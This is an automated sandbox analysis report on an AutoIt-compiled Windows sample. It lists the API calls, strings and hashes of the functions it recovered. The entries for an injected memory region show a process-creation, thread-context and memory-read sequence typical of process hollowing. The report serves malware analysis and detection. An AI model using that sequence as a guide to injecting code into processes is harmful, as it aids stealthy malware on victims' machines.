                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$CreateShow
                                                              • String ID: AutoIt v3$edit
                                                              • API String ID: 1584632944-3779509399
                                                              • Opcode ID: 33b270fbb94111eb4d132423673b37cad156b1ff3bbfb15398d58c67e3840c7e
                                                              • Instruction ID: 71d4d4ca74fa2381b3ad87fce2d46482f59a67401a953560a5379dd2f10d2e71
                                                              • Opcode Fuzzy Hash: 33b270fbb94111eb4d132423673b37cad156b1ff3bbfb15398d58c67e3840c7e
                                                              • Instruction Fuzzy Hash: 19F03A705002907EEA305B2B6C0CE7B2E7DD7C6F50B1242BABA04E2170C6650820CEB9

                                                              Control-flow Graph

                                                              [Graph image not reproduced: control-flow graph of function 01F923B0 (blocks 1f923b0-1f92593) with calls to CreateFileW, VirtualAlloc, ReadFile and ExitProcess; executed/not-executed marking not recoverable from the extracted text]
                                                              APIs
                                                                • Part of subcall function 01F922A0: Sleep.KERNELBASE(000001F4), ref: 01F922B1
                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01F924CD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2137747443.0000000001F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1f90000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CreateFileSleep
                                                              • String ID: GJ9UX6DKB2QJXJB
                                                              • API String ID: 2694422964-4204639856
                                                              • Opcode ID: 289dde00aad2f02ae99932ac3e702bb57337e5d5e5a2272f0593ce59dc4bcef9
                                                              • Instruction ID: dd9a1e66938174aff19cf6777e2c1f15b8a914eb4c40ada2816bdbd67aa1b7d3
                                                              • Opcode Fuzzy Hash: 289dde00aad2f02ae99932ac3e702bb57337e5d5e5a2272f0593ce59dc4bcef9
                                                              • Instruction Fuzzy Hash: 48518231D04249EBEF15EBE4C814BEEBB79AF55300F004198E609BB2C1D7BA1B49CB65

                                                              Control-flow Graph

                                                              [Graph image not reproduced: control-flow graph of function 0043407C (blocks 43407c-46d41e) with calls to LoadStringW and Shell_NotifyIconW; executed/not-executed marking not recoverable from the extracted text]
                                                              APIs
                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0046D3D7
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                              • _memset.LIBCMT ref: 004340FC
                                                              • _wcscpy.LIBCMT ref: 00434150
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00434160
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                              • String ID: Line:
                                                              • API String ID: 3942752672-1585850449
                                                              • Opcode ID: 6d59ee2d36c021d9925bd3668daf1a0fe69d5e2e3579de8d1aaceaa22d0db240
                                                              • Instruction ID: ab07bed2cfd580a7d32a9db5ee3c45df15f6233e176b5cdabeab106ec9a0fae0
                                                              • Opcode Fuzzy Hash: 6d59ee2d36c021d9925bd3668daf1a0fe69d5e2e3579de8d1aaceaa22d0db240
                                                              • Instruction Fuzzy Hash: 6C31D271108705ABD730EB61DC45BEB77E8AF48308F10562FF68592191DB78A658CB8F
                                                              APIs
                                                                • Part of subcall function 00434DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00434E0F
                                                              • _free.LIBCMT ref: 0046E263
                                                              • _free.LIBCMT ref: 0046E2AA
                                                                • Part of subcall function 00436A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00436BAD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                              • API String ID: 2861923089-1757145024
                                                              • Opcode ID: dd2b34f7bb52bbb0938c69f4d4888a19d029a7180bddd6b8df0a44ef34178e10
                                                              • Instruction ID: 5d5c3430a25124b6d38ac48cf0dad262a8c56bbce00fc336ed8dccf5dca2bf26
                                                              • Opcode Fuzzy Hash: dd2b34f7bb52bbb0938c69f4d4888a19d029a7180bddd6b8df0a44ef34178e10
                                                              • Instruction Fuzzy Hash: A091AF75900219AFCF04EFA6CC519EEB7B4FF09314F10446FE815AB2A1EB78A905CB59
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004335A1,SwapMouseButtons,00000004,?), ref: 004335D4
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,004335A1,SwapMouseButtons,00000004,?,?,?,?,00432754), ref: 004335F5
                                                              • RegCloseKey.KERNELBASE(00000000,?,?,004335A1,SwapMouseButtons,00000004,?,?,?,?,00432754), ref: 00433617
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: Control Panel\Mouse
                                                              • API String ID: 3677997916-824357125
                                                              • Opcode ID: fe7ed9d5fedd7fb18a4f5b581c9497dc27d2b6ad2464c12a2f9d331eb9c64d98
                                                              • Instruction ID: 2f0305700a78fca4fdce5e354ad81702b186f7a538fd0fc0f1fd1f82a8bc34fe
                                                              • Opcode Fuzzy Hash: fe7ed9d5fedd7fb18a4f5b581c9497dc27d2b6ad2464c12a2f9d331eb9c64d98
                                                              • Instruction Fuzzy Hash: AC114871910208BFDB20DF64DC419AFB7BCEF08741F00556AF809D7210D2759F549768
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01F91A5B
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01F91AF1
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01F91B13
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2137747443.0000000001F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1f90000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                              • Instruction ID: ccc9b15c8e24fe07aedb4f78e2e42f6f5a16b329c06e485ed422a294e748128c
                                                              • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                              • Instruction Fuzzy Hash: D9620C30A14659DBEB24DFA4C850BDEB772EF58300F1091A9D10DEB390E77A9E81CB59
                                                              APIs
                                                                • Part of subcall function 00434EE5: _fseek.LIBCMT ref: 00434EFD
                                                                • Part of subcall function 00499734: _wcscmp.LIBCMT ref: 00499824
                                                                • Part of subcall function 00499734: _wcscmp.LIBCMT ref: 00499837
                                                              • _free.LIBCMT ref: 004996A2
                                                              • _free.LIBCMT ref: 004996A9
                                                              • _free.LIBCMT ref: 00499714
                                                                • Part of subcall function 00452D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00459A24), ref: 00452D69
                                                                • Part of subcall function 00452D55: GetLastError.KERNEL32(00000000,?,00459A24), ref: 00452D7B
                                                              • _free.LIBCMT ref: 0049971C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                              • String ID:
                                                              • API String ID: 1552873950-0
                                                              • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                              • Instruction ID: 44e0b27076a87e2e41ab8428d5fc19437e4c12069863d37d29a993e30942b44b
                                                              • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                              • Instruction Fuzzy Hash: C4514EB1904219AFDF249FA5DC81AAEBB79EF48304F1404AFF609A3241DB755E84CF58
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                              • String ID:
                                                              • API String ID: 2782032738-0
                                                              • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                              • Instruction ID: 7caebcbcc51e0287248e3495dd48301f6accc046c27c5b4d33d4a4611a4a5171
                                                              • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                              • Instruction Fuzzy Hash: 24410834A00745ABCB189E69C8809AF77A5AFC535AB10817FEC158F742E738DDC98B48
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID: AU3!P/L$EA06
                                                              • API String ID: 4104443479-584251071
                                                              • Opcode ID: cf3ad109832178d58d370f6ffb4407bd84747eb00efef499707997fc37a57ba5
                                                              • Instruction ID: 91ed7b442460471391c6bb2f906b01720a36bbb08f61a38ba218a11bb806efe5
                                                              • Opcode Fuzzy Hash: cf3ad109832178d58d370f6ffb4407bd84747eb00efef499707997fc37a57ba5
                                                              • Instruction Fuzzy Hash: 89419D21A0015857DF219B5488527FF7FA1DBCD304F68607BEC829B382D62C7D4587AA
                                                              APIs
                                                              • _memset.LIBCMT ref: 0046EA39
                                                              • GetOpenFileNameW.COMDLG32(?), ref: 0046EA83
                                                                • Part of subcall function 00434750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00434743,?,?,004337AE,?), ref: 00434770
                                                                • Part of subcall function 00450791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004507B0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                              • String ID: X
                                                              • API String ID: 3777226403-3081909835
                                                              • Opcode ID: 4a8490fbf8dc981a7a918020385ac2d8fa1d8b3208ba2b161884b17cb9e03a7e
                                                              • Instruction ID: 6f558b76faf609c988482383c7c155e129a6e3036c3f8c086db08d8a00bf6de9
                                                              • Opcode Fuzzy Hash: 4a8490fbf8dc981a7a918020385ac2d8fa1d8b3208ba2b161884b17cb9e03a7e
                                                              • Instruction Fuzzy Hash: B021D470A102489BCF519FD5C845AEE7BF8AF48319F00805BE548A7241DBB859498F9A
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 004998F8
                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0049990F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Temp$FileNamePath
                                                              • String ID: aut
                                                              • API String ID: 3285503233-3010740371
Memory Dump Source
• Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• _memset.LIBCMT ref: 00434370
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 00434415
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00434432
Memory Dump Source
• Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
Similarity
• API ID: IconNotifyShell_$_memset
• String ID:
• API String ID: 1505330794-0
APIs
• __FF_MSGBANNER.LIBCMT ref: 00455733
  • Part of subcall function 0045A16B: __NMSG_WRITE.LIBCMT ref: 0045A192
  • Part of subcall function 0045A16B: __NMSG_WRITE.LIBCMT ref: 0045A19C
• __NMSG_WRITE.LIBCMT ref: 0045573A
  • Part of subcall function 0045A1C8: GetModuleFileNameW.KERNEL32(00000000,004F33BA,00000104,?,00000001,00000000), ref: 0045A25A
  • Part of subcall function 0045A1C8: ___crtMessageBoxW.LIBCMT ref: 0045A308
  • Part of subcall function 0045309F: ___crtCorExitProcess.LIBCMT ref: 004530A5
  • Part of subcall function 0045309F: ExitProcess.KERNEL32 ref: 004530AE
  • Part of subcall function 00458B28: __getptd_noexit.LIBCMT ref: 00458B28
• RtlAllocateHeap.NTDLL(01210000,00000000,00000001,00000000,?,?,?,00450DD3,?), ref: 0045575F
Memory Dump Source
• Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
Similarity
• API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
• String ID:
• API String ID: 1372826849-0
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00499548,?,?,?,?,?,00000004), ref: 004998BB
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00499548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004998D1
• CloseHandle.KERNEL32(00000000,?,00499548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004998D8
Memory Dump Source
• Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
APIs
• _free.LIBCMT ref: 00498D1B
  • Part of subcall function 00452D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00459A24), ref: 00452D69
  • Part of subcall function 00452D55: GetLastError.KERNEL32(00000000,?,00459A24), ref: 00452D7B
• _free.LIBCMT ref: 00498D2C
• _free.LIBCMT ref: 00498D3E
Memory Dump Source
• Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
Similarity
• API ID:
• String ID: CALL
• API String ID: 0-4196123274
APIs
Memory Dump Source
• Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
• IsThemeActive.UXTHEME ref: 00434834
  • Part of subcall function 0045336C: __lock.LIBCMT ref: 00453372
  • Part of subcall function 0045336C: DecodePointer.KERNEL32(00000001,?,00434849,00487C74), ref: 0045337E
  • Part of subcall function 0045336C: EncodePointer.KERNEL32(?,?,00434849,00487C74), ref: 00453389
  • Part of subcall function 004348FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00434915
  • Part of subcall function 004348FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0043492A
  • Part of subcall function 00433B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00433B68
  • Part of subcall function 00433B3A: IsDebuggerPresent.KERNEL32 ref: 00433B7A
  • Part of subcall function 00433B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004F52F8,004F52E0,?,?), ref: 00433BEB
  • Part of subcall function 00433B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00433C6F
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00434874
Memory Dump Source
• Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
Similarity
• API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
• String ID:
• API String ID: 1438897964-0
APIs
  • Part of subcall function 0045571C: __FF_MSGBANNER.LIBCMT ref: 00455733
  • Part of subcall function 0045571C: __NMSG_WRITE.LIBCMT ref: 0045573A
  • Part of subcall function 0045571C: RtlAllocateHeap.NTDLL(01210000,00000000,00000001,00000000,?,?,?,00450DD3,?), ref: 0045575F
• std::exception::exception.LIBCMT ref: 00450DEC
• __CxxThrowException@8.LIBCMT ref: 00450E01
  • Part of subcall function 0045859B: RaiseException.KERNEL32(?,?,?,004E9E78,00000000,?,?,?,?,00450E06,?,004E9E78,?,00000001), ref: 004585F0
Memory Dump Source
• Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
Similarity
• API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
• String ID:
• API String ID: 3902256705-0
APIs
  • Part of subcall function 00458B28: __getptd_noexit.LIBCMT ref: 00458B28
• __lock_file.LIBCMT ref: 004553EB
  • Part of subcall function 00456C11: __lock.LIBCMT ref: 00456C34
• __fclose_nolock.LIBCMT ref: 004553F6
Memory Dump Source
• Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 01F91A5B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01F91AF1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01F91B13
Memory Dump Source
• Source File: 00000000.00000002.2137747443.0000000001F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1f90000_BLv4mI7zzY.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
                                                              • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
